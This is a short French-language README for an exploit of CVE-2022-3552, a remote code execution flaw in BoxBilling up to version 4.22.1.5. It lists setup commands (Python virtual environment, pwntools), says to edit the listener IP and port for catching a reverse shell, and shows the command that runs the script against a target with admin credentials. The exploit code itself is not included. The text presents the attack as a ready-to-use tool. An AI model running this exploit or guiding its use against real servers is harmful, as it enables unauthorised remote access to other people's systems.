
CVE-2022-3552 RCE avec des étapes d'exploitation détaillées
Afin d'exploiter la vulnérabilité dans BoxBilling, la version devra être : "BoxBilling<=4.22.1.5" et vous devrez disposer d'identifiants admin valides.
Si vous êtes dans la situation ci-dessus, voici les étapes à suivre pour obtenir le joli RCE :
Créez un environnement virtuel Python (Linux)
python3 -m venv .venv
source .venv/bin/activate
Installez maintenant la bibliothèque pwntools
pip3 install pwntools
S'il se plaint de dépendances manquantes, vous devrez peut-être aussi installer certains paquets système :
sudo apt update
sudo apt install python3-pwntools
Dans le code, il y a quelques lignes qui nécessitent des ajustements, ce sont les lignes qui déterminent l'adresse IP lhost et le port avec lequel vous prévoyez de capturer le shell.
Si vous avez fait tout cela correctement, vous devriez maintenant pouvoir exécuter l'exploit et obtenir un shell ! (-d = cible, -u = un email admin valide, -p = le mot de passe de l'admin valide)
python3 CVE-2022-3552.py -d http://victimtarget.com -u [email protected] -p enterpassword1HERE